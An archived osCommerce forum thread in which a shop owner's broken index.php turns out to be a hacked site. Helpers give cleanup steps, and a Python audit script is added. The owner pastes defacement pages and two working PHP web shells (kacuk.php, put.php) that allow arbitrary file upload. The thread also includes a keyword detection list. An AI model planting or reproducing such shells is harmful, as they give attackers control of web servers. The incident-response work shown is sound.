Error in a homepage


Racing Club


hello

 

I have a problem.

 

From one day to the next my website changed. Before, it worked fine. But now I see this message on the homepage and the admin:

 

homepage: Parse error: syntax error, unexpected '<' in /home/videoclub/public_html/index.php on line 35

 

admin: Parse error: syntax error, unexpected '<' in /home/videoclub/public_html/admin/index.php on line 26

 

----------------------------------------------

 

Line 35: <!doctype html public "-//W3C//DTD HTML 4.01 Transitional//EN">

Line 26: <!doctype html public "-//W3C//DTD HTML 4.01 Transitional//EN">

 

Please help.

 

Thanks

 

I use version v2.2RC2a of oscommerce


Ariel,

 

check your website for hacker activity. Hackers usually try to insert code at the top of the index.php files. Perhaps you can post the first 30 lines so we can see it.

 

 

 

 

Chris


Thanks for replying

 

index.php of homepage:

 

<?php
/*
  $Id: index.php 1739 2007-12-20 00:52:16Z hpdl $

  osCommerce, Open Source E-Commerce Solutions
  http://www.oscommerce.com

  Copyright © 2003 osCommerce

  Released under the GNU General Public License
*/

  require('includes/application_top.php');

// the following cPath references come from application_top.php
  $category_depth = 'top';
  if (isset($cPath) && tep_not_null($cPath)) {
    $categories_products_query = tep_db_query("select count(*) as total from " . TABLE_PRODUCTS_TO_CATEGORIES . " where categories_id = '" . (int)$current_category_id . "'");
    $cateqories_products = tep_db_fetch_array($categories_products_query);
    if ($cateqories_products['total'] > 0) {
      $category_depth = 'products'; // display products
    } else {
      $category_parent_query = tep_db_query("select count(*) as total from " . TABLE_CATEGORIES . " where parent_id = '" . (int)$current_category_id . "'");
      $category_parent = tep_db_fetch_array($category_parent_query);
      if ($category_parent['total'] > 0) {
        $category_depth = 'nested'; // navigate through the categories
      } else {
        $category_depth = 'products'; // category has no products, but display the 'no products' message
      }
    }
  }

  require(DIR_WS_LANGUAGES . $language . '/' . FILENAME_DEFAULT);

<!doctype html public "-//W3C//DTD HTML 4.01 Transitional//EN">
<html <?php echo HTML_PARAMS;>
<head>

 

index.php of admin:

 

<?php
/*
  $Id: index.php 1739 2007-12-20 00:52:16Z hpdl $

  osCommerce, Open Source E-Commerce Solutions
  http://www.oscommerce.com

  Copyright © 2007 osCommerce

  Released under the GNU General Public License
*/

  require('includes/application_top.php');

  $languages = tep_get_languages();
  $languages_array = array();
  $languages_selected = DEFAULT_LANGUAGE;
  for ($i = 0, $n = sizeof($languages); $i < $n; $i++) {
    $languages_array[] = array('id' => $languages[$i]['code'],
                               'text' => $languages[$i]['name']);
    if ($languages[$i]['directory'] == $language) {
      $languages_selected = $languages[$i]['code'];
    }
  }

<!doctype html public "-//W3C//DTD HTML 4.01 Transitional//EN">
<html <?php echo HTML_PARAMS;>
<head>


Ariel,

 

Are you sure you didn't make recent changes to accommodate additional language support ?

 

In the index.php, this:

 

  require(DIR_WS_LANGUAGES . $language . '/' . FILENAME_DEFAULT);

<!doctype html public "-//W3C//DTD HTML 4.01 Transitional//EN">
<html <?php echo HTML_PARAMS;>
<head>

 

Should be this:

 

  require(DIR_WS_LANGUAGES . $language . '/' . FILENAME_DEFAULT);
?>
<!doctype html public "-//W3C//DTD HTML 4.01 Transitional//EN">
<html <?php echo HTML_PARAMS; ?>>
<head>

 

 

NOTE the ?> BEFORE the doctype line ? It is also missing in your /admin/index.php and the language code

 

  $languages = tep_get_languages();
  $languages_array = array();
  $languages_selected = DEFAULT_LANGUAGE;
  for ($i = 0, $n = sizeof($languages); $i < $n; $i++) {
    $languages_array[] = array('id' => $languages[$i]['code'],
                               'text' => $languages[$i]['name']);
    if ($languages[$i]['directory'] == $language) {
      $languages_selected = $languages[$i]['code'];
    }
  }

 

is not standard in the default download.

 

 

 

 

Chris


Ariel,

 

This is the first 37 lines from a default index.php file. Try it. Remember to back up before making any changes.

 

<?php
/*
  $Id: index.php 1739 2007-12-20 00:52:16Z hpdl $

  osCommerce, Open Source E-Commerce Solutions
  http://www.oscommerce.com

  Copyright © 2003 osCommerce

  Released under the GNU General Public License
*/

  require('includes/application_top.php');

// the following cPath references come from application_top.php
  $category_depth = 'top';
  if (isset($cPath) && tep_not_null($cPath)) {
    $categories_products_query = tep_db_query("select count(*) as total from " . TABLE_PRODUCTS_TO_CATEGORIES . " where categories_id = '" . (int)$current_category_id . "'");
    $cateqories_products = tep_db_fetch_array($categories_products_query);
    if ($cateqories_products['total'] > 0) {
      $category_depth = 'products'; // display products
    } else {
      $category_parent_query = tep_db_query("select count(*) as total from " . TABLE_CATEGORIES . " where parent_id = '" . (int)$current_category_id . "'");
      $category_parent = tep_db_fetch_array($category_parent_query);
      if ($category_parent['total'] > 0) {
        $category_depth = 'nested'; // navigate through the categories
      } else {
        $category_depth = 'products'; // category has no products, but display the 'no products' message
      }
    }
  }

  require(DIR_WS_LANGUAGES . $language . '/' . FILENAME_DEFAULT);
?>
<!doctype html public "-//W3C//DTD HTML 4.01 Transitional//EN">
<html <?php echo HTML_PARAMS; ?>>
<head>

 

 

Chris


It is hard to say if the site has been compromised based on the little information you have given and without seeing the URL. However, if you did not make the changes to the index.php and /admin/index.php then there has been some unauthorized activity.

 

 

 

Chris


You have hack files all over in the images folder.

:o

 

Visit the link below:

 

How to Secure Your Site

 

Pay close attention to "SECURING THE ADMIN" - Yours is vulnerable.

If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you.

 

"Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice."

- Me -

 

"Headers already sent" - The definitive help

 

"Cannot redeclare ..." - How to find/fix it

 

SSL Implementation Help

 


Recently I started to see the images folder and I found this (as you are saying):

 

ina.htm: HACKED BY <h4> <center> kaMtiEz </h4> </center> <center> <h4> <br> INDONESIANCODER TEAM @ 2010 </h4> </center>

indonesia.htm: <html><head>

<title>Hacker Indonesia</title><style type="text/css">
html, body {
  color: white;
  background-color: #000080;
}

a {
  background-color: transparent;
  color: #ffffff;
}

#p404 {
  position: absolute;
  top: 20%;
  left: 0px;
  width: 100%;
  height: 1px;
  overflow: visible;
  visibility: visible;
  display: block;
}

#content {
  margin-left: -320px;
  position: absolute;
  top: -100px;
  left: 50%;
  width: 640px;
  height: 200px;
  visibility: visible;
}

#errormessage {
  font: 50px garamond;
  line-height: 200%;
  text-align: center;
}

#title, #footer {
  text-align: center;
}

#title span {
  background-color: #c0c0c0;
  color: #000080;
}
</style><meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"></head><body>
<div id="p404">
<div id="content">
<div id="errormessage">
<p>Hacked by Hmei7</p>
</p>
</div>
</div>
</div>
</body></html>

 

kacuk.php: ==kacuk

 

<?php echo '<br><br>'.php_uname().'<br>'; echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">'; echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>'; if( $_POST['_upl'] == "Upload" ) { if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo 'File Uploaded!<br><br>'; } else { echo 'File Upload, Failed!<br><br>'; } } ?>

 

==

 

x.htm: <b><font size="5">by iskorpitx</font></b>

 

 

(I'm not sure)

put.php: <?php

 

echo '<b>The KabuS<br><br>'.php_uname().'<br></b>';

 

echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';

 

echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';

 

if( $_POST['_upl'] == "Upload" ) {

 

if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Upload Success !!!</b><br><br>'; }

 

else { echo '<b>Upload Fail !!!</b><br><br>'; }

 

}

 

?>

 

----------------------------------

 

 

I'll keep the advice you gave me on "Securing the ADMIN".

But can I get my website as it was before?

What should I do?


Ariel,

 

Follow these steps to clean and secure your website:

 

1) Lock down your site by using an .htaccess password so your customers are not attacked by the hacker's code.

 

2) FTP all of the files to your local machine and use a program like WinGrep to identify and remove all malicious and anomalous files containing hacker code. Look for keywords such as 'base64','eval','decode'.

 

3) Delete the files on your hosting account before uploading the clean files.

 

4) FTP the clean files back to your hosting account and read and implement the security patches and contributions found in these two threads. Admin Security and Website Security.

 

5) Change all of your passwords: FTP, CPANEL, STORE ADMIN and DATABASE

 

6) Make sure File and Directory Permissions are set correctly. Directories no higher than 755, Files no higher than 644 and the TWO configure.php files no higher than 444

 

7) If your site has been 'black listed' as an attack site by Google, then log into Google Webmaster Tools and submit the site to be re-indexed and verified to be removed from the 'black list'

 

8) Remove the .htaccess password protection so your customers can resume making purchases from your website.

 

9) Monitor your website using the newly installed contributions to prevent future hacker attacks.

 

10) [Removed].

 

 

 

Chris


I deleted these files from the images folder:

 

ina.htm

indonesia.htm

kacuk.php

x.htm

put.php

 

 

In point 2 where you asked me to find these keywords:

eval base64 decode

 

Those words were found in a few files called:

googleff7fe2850f15ebd7.php

googlebc44d7671aae3b3e.php

google7a14fb0c01e4e5d1.php

 

What should I do?


Those are all hack files.

 

It's not normal on 99.99% (or more) installs to have ANY php files in the images folder.

 

Unless you purposely put a php file in the images folder and you know exactly what it does I'd remove any and all php files from the images folder.

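Added example, not part of the thread: a Python script that applies the checks from steps 2 and 6 of the cleanup list and the "no PHP files in the images folder" rule to a copy of the shop. The function names, the sample tree and its file contents are constructed for illustration; the permission check is only meaningful on the host's Unix file system, and keyword hits also occur in legitimate code, so they are a list to review by hand.

```python
import os
import re
import stat
import tempfile

KEYWORDS = re.compile(rb"base64|eval|decode", re.I)  # keywords from step 2
TEXT_EXT = (".php", ".htm", ".html", ".js")
MAX_DIR, MAX_FILE, MAX_CONFIGURE = 0o755, 0o644, 0o444  # step 6 limits, used as bit masks


def audit(root):
    """Return sorted (relative_path, reason) findings for a copy of the shop."""
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            is_dir = name in dirnames
            limit = MAX_DIR if is_dir else (
                MAX_CONFIGURE if name == "configure.php" else MAX_FILE)
            mode = stat.S_IMODE(os.lstat(path).st_mode)
            if mode & ~limit:  # any permission bit outside the allowed mask
                findings.append((rel, "mode %o exceeds %o" % (mode, limit)))
            if is_dir or not name.lower().endswith(TEXT_EXT):
                continue
            if "images" in rel.split("/")[:-1] and name.lower().endswith(".php"):
                findings.append((rel, "php file in images folder"))
            with open(path, "rb") as fh:
                hit = KEYWORDS.search(fh.read())
            if hit:  # legitimate code matches too, so this is a review list
                word = hit.group().decode().lower()
                findings.append((rel, "keyword '%s', review by hand" % word))
    return sorted(findings)


def build_sample(root):
    """Constructed sample tree: names echo the thread, contents are made up."""
    sample = {
        "index.php": (0o644, b"<?php require('includes/application_top.php'); ?>\n"),
        "includes/configure.php": (0o644, b"<?php define('DB_SERVER', 'localhost'); ?>\n"),
        "images/logo.gif": (0o644, b"GIF89a"),
        "images/put.php": (0o644, b"<?php echo php_uname(); ?>\n"),
        "images/x.htm": (0o666, b"<b>placeholder</b>\n"),
        "googleXXXX.php": (0o644, b"<?php eval(base64_decode('')); ?>\n"),
    }
    for rel, (mode, data) in sample.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as fh:
            fh.write(data)
        os.chmod(path, mode)
    os.chmod(os.path.join(root, "images"), 0o777)    # too open on purpose
    os.chmod(os.path.join(root, "includes"), 0o755)
    return root


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        for rel, reason in audit(build_sample(tmp)):
            print("%-24s %s" % (rel, reason))
```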

Jan,

 

I see you edited #13 post. Please explain where in the forum policies it says I can not invite other members to PM me for additional help ? I have read the forum policies AGAIN, and could not find anything to suggest that I have broken any rules.

 

 

 

For the record, here is #10 on the list again:

 

10) If you feel you can not perform any of the above steps, PM me for help, because if you miss any of these steps your site may remain accessible to the hacker.

 

 

I welcome your response here in the forum, so everyone can see it.

 

 

 

Chris


At the footer of the index.php I found this:

 


 

I already removed it and now I'm adding this:

?>

because it is missing from several lines.

 

I'll report how I progress.

 

Thanks!

 

I was slow to respond because I spent the whole afternoon removing a virus in my computer


Ariel,

 

If you are seeing other URLs in the progress bar on the footer of your browser, this means you have not cleaned the site entirely. If your Admin page is blank, then there is a code error, possibly whitespace before or after the opening or closing PHP tags.

 

 

 

 

Chris


That only happens when I open my website with Internet Explorer; with Mozilla Firefox it does not happen.

Could someone go to my website and see if it is the same, please?

 

Thanks


Ariel,

 

I am not seeing that using IE 8 or FF 3.6. I suggest you clear your temp files and cookies and reload your browser again.

 

 

 

 

 

Chris


Ariel,

 

I am not seeing that using IE 8 or FF 3.6. I suggest you clear your temp files and cookies and reload your browser again.

 

 

Chris

 

What do you see?

 

Because I deleted temp files and cookies and I keep seeing the same thing.

 

Thanks!


Archived

This topic is now archived and is closed to further replies.
